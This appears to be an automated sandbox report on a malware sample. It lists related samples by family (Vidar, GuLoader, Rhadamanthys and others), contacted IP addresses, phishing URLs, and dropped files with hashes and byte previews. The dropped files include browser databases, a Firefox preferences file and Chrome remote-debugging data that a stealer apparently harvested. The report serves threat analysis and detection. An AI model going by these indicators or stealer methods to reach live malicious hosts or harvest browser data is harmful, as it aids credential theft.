	https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3D	Get hash	malicious	Unknown	Browse	172.202.163.200 13.107.246.63
	lnvoice-1620804301.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	172.202.163.200 13.107.246.63
	lnvoice-1620804301.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	172.202.163.200 13.107.246.63
	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse	172.202.163.200 13.107.246.63
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse	172.202.163.200 13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.202.163.200 13.107.246.63
37f463bf4616ecd445d4a1937da06e19	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	159.69.102.165 149.154.167.99
	Company Profile and new order-202401127.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	159.69.102.165 149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165 149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165 149.154.167.99
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	159.69.102.165 149.154.167.99
	2.exe	Get hash	malicious	Unknown	Browse	159.69.102.165 149.154.167.99
	guia241993.vbs	Get hash	malicious	Unknown	Browse	159.69.102.165 149.154.167.99
	win_gui.exe.exe	Get hash	malicious	Unknown	Browse	159.69.102.165 149.154.167.99
	MLETdJL8JJ.exe	Get hash	malicious	GuLoader	Browse	159.69.102.165 149.154.167.99
	eAvqHiIsgR.exe	Get hash	malicious	GuLoader	Browse	159.69.102.165 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\GDT0R9H4EU37\HLNYCB	fim3BhyKXP.gif	Get hash	malicious	Unknown	Browse
	TMX.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	ljwIPDSwFi.exe	Get hash	malicious	DarkGate, MailPassView, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	5CG2133F5Y_2024-04-05_12_15_35.569.zip	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\GDT0R9H4EU37\4WTRQQ

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\58GD2V

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\6PH4O8

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\GVAAAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\GVAAAAAIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\HLNYCB

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24008
Entropy (8bit):	6.062446965815151
Encrypted:	false
SSDEEP:	192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
MD5:	6AEAEBF650EFC93CD3B6670A05724FE8
SHA1:	A4FE07E6C678AC8D4DC095997DB5043668D103B4
SHA-256:	C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
SHA-512:	5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fim3BhyKXP.gif, Detection: malicious, Browse Filename: TMX.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: ljwIPDSwFi.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\J5PP8Q

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\JWBIEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GDT0R9H4EU37\L6XBA1

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2947
Entropy (8bit):	5.120077314818075
Encrypted:	false
SSDEEP:	48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5:	C7E301D9DD77A21C1CDBD73A63AF205C
SHA1:	715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256:	239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512:	B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

C:\ProgramData\GDT0R9H4EU37\VAS26F37Q

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDT0R9H4EU37\ZCJ5X4

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073759813014503
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
MD5:	D17BB0DDEC8CE132BE1B04E7217442D1
SHA1:	74F6104D5C2AD694711A3D12CC4EF056B31F1811
SHA-256:	6E6E5273A2090F723841AA45AFACE34B5363E6AD5E9AECCBDF8851D73A7821EE
SHA-512:	AF03C1F93B7DCDDDD6AFDC37D1AF92AA485C9A0039558CE5EC942E3189105C7017B47D63C35DF4D783C018E26E8A5B8696B73CC4710C4C41AB8F1ED777AB0DE8
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xbf5b140b, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221640935196366
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5:	7640549C3E326B9B3EA2176E2FF2EFEB
SHA1:	62E39D9BF3141D10223F98BE7E097921ED3D95D8
SHA-256:	22B9ACE200A1D8CFD3EB25C737822E3EC20B8DB48B06B9D842B7523FB0F1AE56
SHA-512:	4563805DB1E369E4FE5162E8CEC9CBE564EDEB6CACF202C4A1780F7DB8773DFCD2DC41BDDD7AE4A51AF97FC6558BE37212ABC5D3201E4E3CA70A26D83FBB5DD2
Malicious:	false
Preview:	.[..... .......A.......X\...;...{......................0.!..........{A......\|5.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................5..D.....\|5..................<.X.....\|5..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07625922313173805
Encrypted:	false
SSDEEP:	3:zZKYeDmjGjjn13a/czffAllcVO/lnlZMxZNQl:FKzDEGj53qcz3AOewk
MD5:	C349A05729AA4228E82CE75EEA241E3D
SHA1:	D039F4457C9A4DEEEB860383092591899C46284F
SHA-256:	B2C9B7A52B1FBAA52105EBE2DC27E9B416DD074B2BB70A5BBFC2AF40077E2DCE
SHA-512:	F91C9A9A74C6459115EEF769FC4E2ECA2E51A5903E4B4587A62A11C7998A0DAE1021A641E7327D24E6816501974391916DB961817D5FD8A970C0B295F914FD99
Malicious:	false
Preview:	..kZ.....................................;...{.......\|5......{A..............{A......{A..........{A].................<.X.....\|5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\din.exe

Download File

Process:	C:\Users\user\Desktop\xoJxSAotVM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1188347
Entropy (8bit):	7.9739530655821245
Encrypted:	false
SSDEEP:	24576:TdwswPS3NXCd6M9l+CsTwrm5kRFKX/VcewxF5vYFqc4pqv:pVwuXCdl9OwqmRFKX/mewxDeJGW
MD5:	E3ADDF3612513EBE5830CD5C7C6F0E22
SHA1:	BC1D4ED4A6A7BF73655EFC222A6B67B0A89F8249
SHA-256:	882A0AB69691A6C405C1234CFEC8AA132C1E2C0B178E132C113CBA14F35EF317
SHA-512:	6DD8E3D4506CD554F2C98970B5DB9F145797FB842C0F0F1598700B805E90C6F03033931D54DC09CB18F31865F11775DA02C8E88360E62502EFD028CC791A1445
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p......\|.....@.................................@...........&X..............`(...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...&X.......Z..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.369462638651926
Encrypted:	false
SSDEEP:	48:SfNaoCAgTECAKfNaoCKIKCKdfNaoCJCSfNaoCsVdh0UrU0U8Csw:6NnCdTEClNnCKIKCKJNnCJC6NnCsVP0/
MD5:	372D3BEF5DC1DC589CA3787A8044365B
SHA1:	064CEAD5F8D922C7A1656055ED231D9EEC41C7AC
SHA-256:	0A8A619B1723880BBE3D1CACCC05A5AD11E9BA3FB3DF700E43B47F4580876E2E
SHA-512:	BF7E6CA386E45AF09EBE63A4A72AE70C1F02DC30D3391EC3C16A405A15A220FFDF3DF82C944214D4267E3BDC0AB158840C525B3D875C84C6A7368D11788D9758
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4436CE2BCD104B7D94197CEA7BC42A88",.. "id": "4436CE2BCD104B7D94197CEA7BC42A88",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4436CE2BCD104B7D94197CEA7BC42A88"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/3FA39BB59BF3EAD5154E69969768C19A",.. "id": "3FA39BB59BF3EAD5154E69969768C19A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/3FA39BB59BF3EAD5154E69969768C19A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\112974\Decade.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\112974\r

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	633950
Entropy (8bit):	7.999731425694526
Encrypted:	true
SSDEEP:	12288:9FL7I/mDDGYxG2OFl+C+TwZufxh5jmXCD6zC6egU:j7gYC4yl+C+TwophMXCD6zC63U
MD5:	64D12417B3E52940F9381E12F11992CD
SHA1:	0B80FEC677D13A44921B8D9944F52011560C4AB9
SHA-256:	53F6FA631628FC7769E8736EA7CB03DCC658DCA9E1BF918205CE415F4B0D416C
SHA-512:	537A4B35485DEE52A26A939D9DF7B5CC6D3BBEF2A3C5DC01BBF3C37FEED958B3A3AA76C7EE0FC5559106F62246F62D711DD44EB1997ADBBC881FDF207B2769B4
